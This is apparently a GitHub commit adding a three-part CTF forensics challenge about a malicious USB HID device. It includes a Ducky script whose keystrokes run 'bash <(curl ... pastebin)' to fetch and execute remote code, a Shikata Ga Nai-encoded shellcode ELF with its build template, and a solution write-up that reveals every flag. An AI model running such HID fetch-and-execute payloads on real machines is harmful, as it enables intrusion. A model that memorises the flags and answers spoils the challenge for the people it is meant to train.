Skip to content

Commit

Permalink
forensics(HIDden): add 3-part challenge
Browse files Browse the repository at this point in the history
  • Loading branch information
@s3nn
s3nn authored Apr 30, 2024
1 parent c14d3c6 commit 07ed1eb
Show file tree
Hide file tree
Showing 39 changed files with 849 additions and 0 deletions.
26 changes: 26 additions & 0 deletions forensics/HIDden-1/challenge.yml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
name: "HIDden-1"
author: "s3nn"
category: forensics

description: |
You are thrust into a clandestine digital realm, where enigmatic forces threaten global stability. As a recruit of an elite cyber task force, your mission is to navigate the shadowy depths of encrypted networks. Unravel the mysteries of covert communications, decrypt encrypted traffic, and decipher the intentions behind cryptic commands. Amidst the chaos, you'll confront the challenge of dissecting obscure digital artifacts, piecing together their secrets to safeguard the digital frontier. Are you prepared to dive into the unknown and emerge as a master of the digital domain?
value: 500
type: dynamic
extra:
initial: 500
minimum: 100
decay: 25

flags:
- CCSC{Dis4bling_USBs_D03s_n0t_Dis4ble_HID}

tags:
- forensics

files:
- "public/inject.bin"
- "public/traffic.pcapng"

state: visible
version: "0.1"
Binary file added forensics/HIDden-1/public/inject.bin
View file
Binary file not shown.
Binary file added forensics/HIDden-1/public/traffic.pcapng
View file
Binary file not shown.
9 changes: 9 additions & 0 deletions forensics/HIDden-1/setup/ducky_cradle.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
REM part1

DELAY 1000
CTRL-ALT t
DELAY 1000
STRING bash <(curl -ski https://pastebin.com/raw/bLfwPMuM) # CCSC{Dis4bling_USBs_D03s_n0t_Dis4ble_HID}
DELAY 2000

ALT F4
Binary file added forensics/HIDden-1/setup/flag3.exe
View file
Binary file not shown.
1 change: 1 addition & 0 deletions forensics/HIDden-1/setup/flag3.exe.b64
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAABBAAAAAAABAAAAAAAAAAFARAAAAAAAAAAAAAEAAOAAFAEAABAADAAEAAAAEAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAiAEAAAAAAACIAQAAAAAAAAAQAAAAAAAAAQAAAAcAAAAAEAAAAAAAAAAQQAAAAAAAABBAAAAAAAAjAQAAAAAAACMBAAAAAAAAABAAAAAAAAAEAAAABAAAAFgBAAAAAAAAWAFAAAAAAABYAUAAAAAAADAAAAAAAAAAMAAAAAAAAAAIAAAAAAAAAFPldGQEAAAAWAEAAAAAAABYAUAAAAAAAFgBQAAAAAAAMAAAAAAAAAAwAAAAAAAAAAgAAAAAAAAAUeV0ZAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAEAAAAIAAAAAUAAABHTlUAAQABwAQAAAABAAAAAAAAAAIAAcAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOjwAAAA6wXU5VeLkkjB1wBFMFkUxVaWztd3ngLi9v//AEQwPAtEAjwL4vY7ayzshISEdLJprq6urpCfYIEOrvsZFG3y8vLiaFjglu0DtwxU9i+h4UnNH6soWMMeTeEhCUkx5D0+tQJImclxIVXFAUnxKxSK2ozPE5vLjExMTExM+rF2dnZ2ZixZbUn9unhwcHBuWVwKd2O3/0JZDQ7KMnhJdd//EVkO6aFcEkTPvm8mDkiGwL50dHR0ZCol2t5kkYbkzCS+zcrLItbw8e7v7lbOWtavD4cGdJA+V9/uroQB2lBdT6QUUhWlmZmZGU0Ew8PDw7uqWUnB6wDrBSrONutLgWkLBHmpy4FpD/6Uy82BQRMpiKmK6wXGQeVHXvdRF//hAAAuc2hzdHJ0YWIALm5vdGUuZ251LnByb3BlcnR5AC5zaGVsbGNvZGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAAAABwAAAAIAAAAAAAAAWAFAAAAAAABYAQAAAAAAADAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAHgAAAAEAAAAHAAAAAAAAAAAQQAAAAAAAABAAAAAAAAAjAQAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAADAAAAAAAAAAAAAAAAAAAAAAAAACMRAAAAAAAAKQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA=
Binary file added forensics/HIDden-1/setup/sc.bin
View file
Binary file not shown.
Binary file added forensics/HIDden-1/setup/sc.sgn
View file
Binary file not shown.
129 changes: 129 additions & 0 deletions forensics/HIDden-1/setup/template.x64.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,129 @@
# File used to create / deug shellcode
# taken from: https://github.com/nobodyisnobody/docs/tree/main/modern.templates.for.shellcoding

context.log_level = 'error'
from pwn import *
context.terminal = ['kitty', '@', 'launch', '--cwd', 'current', '--location', 'hsplit', '--title', 'DEBUG']
context.update(arch="amd64", os="linux")

if (len(sys.argv) < 1):
print('%s [RUN or GDB or EXE]' % (sys.argv[0]))
exit(1)

def dumpit(shellc):
print('shellcode length: {:d} bytes'.format(len(shellc)))
# dump as hex number array
print('\n\"\\x{}\"'.format('\\x'.join([format(b, '02x') for b in bytearray(shellc)])))
# dump as C array
print("\nunsigned char shellc[] = {{{}}};".format(", ".join([format(b, '#02x') for b in bytearray(shellc)])))
# dump as hex array
print('\npossibly problematic values are highlighted (00,0a,20)...\n')
print(hexdump(shellc, highlight=b'\x0a\x20\x00'))

# put your shellcode here
shellc = asm('''
/* Check GID and exit */
mov rax, 104
mov rdi, 0
syscall
cmp eax, 0xdeadbeef
jne exit
/* push ctx */
push 0x30
mov rax, 0x6e595c687b446667
push rax
mov rax, 0x4c53635b767f4c52
push rax
mov rax, 0x516867077d592774
push rax
mov rax, 0x3e435a4c50645074
push rax
/* Read key */
sub rsp, 8
mov rax, 0
mov rdi, 0
lea rsi, [rsp]
mov rdx, 8
syscall
lea rbx, [rsp]
mov rbx, [rbx]
add rsp, 8
/* xor(0x13371337, 'rsp', 0x20) */
xor rax, rax
push 0x20
pop rsi
mov rdi, rsp
add rsi, rdi
start_6:
mov rcx, [rdi]
xor ecx, ebx
mov rdx, 0xcafebabe
add rdi, 4
cmp rdi, rsi
jb start_6
/* push Try Harder */
push 0x1010101 ^ 0x7265
xor dword ptr [rsp], 0x1010101
mov rax, 0x6472614820797254
push rax
pop rcx
xor rax, rax
xor rbx, rbx
xor rdx, rdx
jmp exit
exit:
mov rax, 60
mov rdi, 0
syscall
''')

dumpit(shellc)

if args.WRITE:
with open('sc.bin', 'wb') as f:
f.write(shellc)

if args.EXE:
ELF.from_bytes(shellc).save('binary')

if args.RUN:
p = run_shellcode(shellc)
p.interactive()
elif args.GDB:
p = debug_shellcode(shellc, gdbscript='''
# set your pwndbg path here
init-pwndbg
b *0x401010
b *0x401066
c
set $rax=0xdeadbeef
c
''')
p.send(p64(0x13371337))
p.interactive()

# =-=- Xor stuff =-=-=

# flag = b'CCSC{It-C4nn0t_Be_Helpd_Push_On}
# ctx = b"tPdPLZC>t'Y}\aghQRL\177v[cSLgfD{h\\Yn0"
# key = 0x13371337

# =-=-=- ELF stuff =-=-=-=
# Final ELF was created after writing shellcode to disk, encoding with shikata ga nai and then creating ELF using pwntools from python REPL:

# =-=-= Encode and build =-=-=-
# shikata gai nai: https://github.com/EgeBalci/sgn

# python template.x64.py WRITE
# shikata-ga-nai/sgn -i sc.bin -o sc.sgn -a 64 -v

# (Python REPL) : with open('sc.sgn', 'rb') as f:
#. ..: ELF.from_bytes(f.read()).save('flag3.exe')
53 changes: 53 additions & 0 deletions forensics/HIDden-1/sol/Sol.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,53 @@
# Solution

## Part 1

Decode inject.bin into Ducky Script using https://github.com/dagonis/Mallard

```bash
python mallard/__main__.py -f inject.bin
```

We also get pastebin URL: https://pastebin.com/raw/bLfwPMuM

<details>
<summary>Reveal Flag</summary>
CCSC{Dis4bling_USBs_D03s_n0t_Dis4ble_HID}
</details>

## Part 2

View pastebin and see that the following tool was run on the victim: [TinkererShell.py](https://github.com/4n4nk3/TinkererShell)

After browsing the code, it can be determined that the reverse shell is using a symmetric hard-coded key and AES EAX.Mode. Thankfully the tool has encrypt / decrypt functions and the transmission is in JSON format (encrypted).

So we can pull the JSON lines from the pcap file and feed them into the decryption functions to see the reverse shell comms.

On one line we see that the attacker has cat'd a file called flag.txt which is the flag for part2

The [aes.py](./aes.py) file provides the extracted encrypt / decrypt functions with the extracted encrypted traffic so you can just run it to see the decrypted values.

<details>
<summary>Reveal Flag</summary>
CCSC{part2-N1ce_One-Decrypting_Th3_C0mms}
</details>

## Part 3

From the PCAP we can also see that an attacker has uploaded a large file which is a base64-encoded ELF file.
After decrypting and decoding the file locally, we start debugging the ELF file.

This has been encoded using the Shikata Ga Nai polymorphic encoder so it makes static analysis extremely hard.

After some dynamic analysis and allowing the program to decode itself, we get to a point where the program checks the user's gid and exits if it does not match `0xdeadbeef`. This can be bypassed directly from a debugger or creating a new group.

Secondly, we see that 4 qwords are pushed onto the stack but appear to be garbage.

Thirdly, we see that the program asks for 8 bytes of input and uses the first 4 bytes as a xor key. This key is xored with every QWORD previously pushed onto the stack, one by one. However, the result is still garbage.

At this point, it can be deduced that the 4 QWORDS pushed onto the stack are the flag and the first 4 bytes are `CCSC`, a known plaintext. If we take these bytes and xor them with the first DWORD pushed onto the stack, we get the actual xor key `0x13371337`. We can then modify the program or extract the bytes and xor offline to get the final flag.

<details>
<summary>Reveal Flag</summary>
CCSC{It-C4nn0t_Be_Helpd_Push_On}
</details>
Loading

0 comments on commit 07ed1eb

Please sign in to comment.